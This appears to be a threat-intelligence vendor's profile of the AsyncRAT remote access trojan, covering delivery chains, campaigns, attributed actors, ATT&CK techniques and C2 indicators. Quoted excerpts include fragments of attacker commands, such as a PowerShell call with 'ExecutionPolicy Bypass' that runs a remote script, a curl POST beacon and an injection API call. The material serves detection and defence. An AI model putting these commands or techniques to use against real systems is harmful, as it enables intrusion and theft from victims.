AsyncRAT
AsyncRAT is an open-source .NET remote access trojan (RAT) widely used in cybercriminal activity and observed across numerous phishing, loader, and malware-delivery campaigns. It is commonly delivered through phishing attachments and links, including malicious LNK files, HTML smuggling, ZIP archives, ISO/ZIP/DLL/VBS/EXE chains, and abuse of Windows search-ms/search protocol handlers. It has also been delivered by custom and commodity loaders such as HeartCrypt-packed executables, PanthomVAI-style loaders, and the VOID#GEIST framework, where encrypted AsyncRAT shellcode was staged and injected into suspended explorer.exe processes. AsyncRAT has been observed as a final payload alongside or instead of other commodity malware such as Remcos RAT, XWorm, XenoRAT, DarkCloud, SmokeLoader, and Rhadamanthys.
Documented behaviors include TLS-encrypted command-and-control communications, the ability to proxy C2 traffic through a Tor client, scheduled-task persistence via schtasks.exe, and use of batch-script timeout delays to postpone cleanup of samples from %TEMP%. In one 2026 SEO-poisoning campaign documented by FOX-IT and NCC Group, AsyncRAT was deployed after installation of a weaponized ConnectWise ScreenConnect client and executed via VBScript/PowerShell and in-memory .NET loading with process hollowing into RegAsm.exe. That sample used the mutex confing_me_s, connected to hone32[.]work[.]gd and mora1987[.]work[.]gd on ports 1800-1803, and exhibited hallmark AsyncRAT traits including the default X.509 certificate CN=AsyncRAT Server, AES-256-CBC plus HMAC-SHA256 configuration protection, PBKDF2-derived keys, and TLS-based length-prefixed C2 framing. The same sample supported keylogging, clipboard monitoring, a cryptocurrency clipper for multiple currencies, victim profiling, wallet discovery, and dynamic loading of arbitrary .NET plugins over C2; it stored keystrokes in %AppData%\Keyboard\Log.tmp and clipboard captures in %AppData%\Keyboard\ClipBoard MM-dd-yyyy.tmp.
AsyncRAT has been associated in reporting with multiple threat clusters and campaigns, including TA2541 use of TLS-encrypted C2, SideCopy’s prior pattern of adopting open-source RATs such as AsyncRAT, and phishing activity discussed in relation to Kimsuky/APT-C-55. It has also been observed in attacks against vulnerable MySQL servers and in broad C2 telemetry datasets. High-confidence indicators directly mentioned in the source material include C2 IPs 79.110.49.162 and 111.90.150.186 on ports 6606, 7707, 8808, 8753, 8977, and 9907 from a Trellix-documented campaign; domains hone32[.]work[.]gd and mora1987[.]work[.]gd on ports 1800-1803 from the 2026 SEO-poisoning campaign; mutex confing_me_s; and the default certificate subject CN=AsyncRAT Server.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"...Colombian organizations were reported by Darktrace to have been targeted by Blind Eagle in an attack campaign involving the abuse of the Windows vulnerability, tracked as CVE-2024-43451, that has been ongoing since November."
Google also observed financially motivated actors exploiting the WinRAR path-traversal flaw to distribute commodity remote access tools and information stealers such as XWorm and AsyncRAT...
The authoring agencies have identified the following open source and dual-use tools as used and/or customized by the actors: ▪ AsyncRAT
Groups observed using it
18 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The use of XenoRAT specifically strengthens this attribution, as Seqrite Labs confirmed in December 2024 that SideCopy had formally adopted customised XenoRAT variants as part of their updated toolset, following a similar pattern of open-source RAT adoption seen previously with AsyncRAT.
TA2541 has used TLS encrypted C2 communications including for campaigns using AsyncRAT.
Post lazarusholic lazarusholic.bsky.social did:plc:iqisolaecmif2zmpfbmsq2te "APT-C-55(Kimsuky)组织依托GitHub+Dropbox分发恶意载荷的攻击活动分析" published by Qihoo360. #APT-C-55, #AsyncRAT, #Github, #LNK, #DPRK, #CTI
The terminal payload is typically XWorm or AsyncRAT, both commodity RATs sold through underground forums as Malware-as-a-Service.
Prior to mid-2024, this actor mostly deployed AsyncRAT and used ScreenConnect as a first stage payload less frequently. However, since mid-2024, the actor has primarily used ScreenConnect as an initial access payload. Proofpoint has also observed ScreenConnect on several occasions download and install AsyncRAT following an infection.
The intrusions involved the use of a widely available .NET-based remote access Trojan AsyncRAT. ... AsyncRAT gives attackers a range of capabilities, including keystroke logging, screen capture and remote command execution.
“The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT,” researchers wrote.
"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."
"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."
"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."
TA571 regularly uses 404 TDS in campaigns to deliver malware, including AsyncRAT, NetSupport, and DarkGate.
TAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT, DcRAT, REMCOS RAT, XWorm, and LimeRAT, among others.
...open-source and dual-use tools as used and/or customized by the actors: ... AsyncRAT ...
...glib-2.0.dll: Biblioteca maliciosa encargada de inyectar AsyncRAT en el proceso MSBuild.exe...
The authoring agencies have identified the following open source and dual-use tools as used and/or customized by the actors: ▪ AsyncRAT
The toolkit includes PureLogs, PureHVNC, and repackaged commodity RATs (AsyncRAT, VenomRAT, DcRat, XWorm).
First released in 2019, AsyncRAT enables long-term unauthorized access and post-compromise control, making it a reliable tool for credential theft, lateral movement staging, and follow-on payload delivery.
China-Linked MirrorFace Deploys ANEL and AsyncRAT in New Cyber Espionage Operation
Techniques & procedures
38 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesSophos thinks a single person or group called "ischhfd83" is behind more than a hundred backdoored malware variants... Researchers linked the hundreds of GitHub repositories to a single Russian email address... Sophos researchers looked into ischhfd83's other repositories, finding 141, 133 of which were backdoored in some way or another.
MITRE ATT&CK® Techniques ... Initial Access T1566.001 ... Spearphishing Attachment
MITRE ATT&CK® Techniques ... Initial Access T1566.002 ... Spearphishing Link
Execution
8 techniquesDuring the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
In this variant, SwiftCopy shortcut file runs the PowerShell executable (powershell.exe) with the following parameters: ‘-ExecutionPolicy Bypass’ ... ‘-File \\internetshortcuts[.]link@80\ePWXBTXU\over.ps1’
APT1 has used the Windows command shell to execute commands, and batch scripting to automate execution. Blue Mockingbird has used batch script files to automate execution and deployment of payloads. During HomeLand Justice, threat actors used Windows batch files for persistence and execution.
It executes its primary payload using the command: python runn.py -p new.bin -k a.json
MITRE ATT&CK Matrix ... Initial Access ... T1203 – Exploitation for Client Execution
Upon clicking the link in email or attachment, recipient would be redirected to the website abusing “search-ms” URI protocol handler.
As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.
DLL sideloading (T1574.001) is a technique in which attackers place a malicious DLL in a location that a legitimate application will load instead of the expected library... Among these is a malicious libvlc.dll, which, as a core dependency of vlc.exe, is sideloaded early in the application's execution. | Because Windows searches for DLLs in specific directories, the malicious DLL is loaded and executed when the trusted program starts.
Persistence
3 techniquesDuring the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Privilege Escalation
4 techniquesDuring the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The VBS files execute PowerShell to inject the malicious dll into a legitimate file, accompanied by the opening of a decoy PDF file to deceive victims.
The decrypted payloads are not written to disk as executables. Instead, they are injected directly into separate instances of explorer.exe using Early Bird APC injection... QueueUserAPC(shellcode_ptr, target_thread, 0)
Stealth
11 techniquesThe intrusion relies on an obfuscated batch script (non.bat) to deliver multiple encrypted RAT shellcode payloads... Encrypted shellcode payloads... decrypted dynamically at runtime using XOR key material stored in JSON configuration files
HTML smuggling, a highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features, is increasingly used in email campaigns... When a target user opens the HTML in their web browser, the browser decodes the malicious script, which, in turn, assembles the payload on the host device.
The VBS files execute PowerShell to inject the malicious dll into a legitimate file, accompanied by the opening of a decoy PDF file to deceive victims.
The decrypted payloads are not written to disk as executables. Instead, they are injected directly into separate instances of explorer.exe using Early Bird APC injection... QueueUserAPC(shellcode_ptr, target_thread, 0)
MITRE ATT&CK Matrix ... Defense Evasion ... T1070.004 – Indicator Removal on Host: File Deletion
The script then loads the XOR decryption key from a.json... Upon decoding, the script performs an XOR-based decryption in memory
If the victim clicks on the opened shortcut file, then the malicious DLL file referenced in the command line is executed using the regsvr32.exe utility.
Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.
Virtualization/Sandbox Evasion: Time Based Checks - T1497.003 The STRT identified an interesting TTP associated with DarkCrystal RAT, the use of “W32tm” command with the “stripchart” parameter as an execution‑delay mechanism for both runtime and beaconing activities.
DLL sideloading (T1574.001) is a technique in which attackers place a malicious DLL in a location that a legitimate application will load instead of the expected library... Among these is a malicious libvlc.dll, which, as a core dependency of vlc.exe, is sideloaded early in the application's execution. | Because Windows searches for DLLs in specific directories, the malicious DLL is loaded and executed when the trusted program starts.
All decrypted shellcode payloads (XWorm, XenoRAT, AsyncRAT) execute directly in memory; no decrypted executables are ever written to disk
Defense Impairment
1 techniqueDiscovery
8 techniquesThe content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
Examples include 'TrickBot can identify the user and groups the user belongs to on a compromised host' and multiple entries checking whether the current user is an administrator or has elevated privileges.
MITRE ATT&CK® Techniques ... Discovery T1082 System Information Discovery
MITRE ATT&CK Matrix ... Discovery T1083 – File and Directory Discovery
Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.
Virtualization/Sandbox Evasion: Time Based Checks - T1497.003 The STRT identified an interesting TTP associated with DarkCrystal RAT, the use of “W32tm” command with the “stripchart” parameter as an execution‑delay mechanism for both runtime and beaconing activities.
MITRE ATT&CK Matrix ... Discovery T1518 – Software Discovery
Collection
1 techniqueXworm Capabilities & Impact... Data Theft: Credential stealing, keylogging, screen capturing... XenoRAT... Information Theft: Keylogging, clipboard monitoring, credential harvesting, and screen capturing... AsyncRAT... Information Theft: Keylogging, clipboard monitoring, credential harvesting, and screen capturing.
Command and Control
7 techniquesFurther we see usage of PROPFIND method ... GET method is used to retrieve the content of the file ... MITRE ATT&CK® Techniques ... Command and Control T1071 Application Layer Protocol
The infection chain concludes by transmitting a minimal HTTP beacon back to attacker-controlled command-and-control (C2) infrastructure hosted on TryCloudflare... curl -X POST -d “status=success”
During the 2025 Poland Wiper Attacks, the adversaries utilized Tor nodes for C2. APT28 has routed traffic over Tor and VPN servers to obfuscate their activities. A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network.
A lightweight HTTP POST beacon (status=success) is transmitted to attacker-controlled infrastructure hosted on TryCloudflare, providing operators confirmation of successful staging and injection.
This PowerShell command downloads and executes another PowerShell script... This script downloads two further files... The downloader batch file... also downloads and executes the final payload...
MITRE ATT&CK® Techniques ... Command and Control T1571 Non-Standard Port
For all the network activity, the attacker has employed SSL (Secure Sockets Layer) encryption as a clever tactic to evade network protection measures.
Exfiltration
1 techniqueXworm Capabilities & Impact... Data Theft... Enables attackers to conduct espionage... The infection chain concludes by transmitting a minimal HTTP beacon back to attacker-controlled command-and-control (C2) infrastructure
IOCs tracked for this family
505 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Referenced as another open-source RAT previously adopted by SideCopy in a similar pattern to XenoRAT.
A remote access trojan observed among the offensive tooling hosted across the region.
Remote access trojan observed among malware families tied to regional C2 infrastructure.
Remote access trojan used as a downloaded payload in the search-ms abuse campaign, enabling remote control of infected systems and malicious actions such as information theft, monitoring, and command execution.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.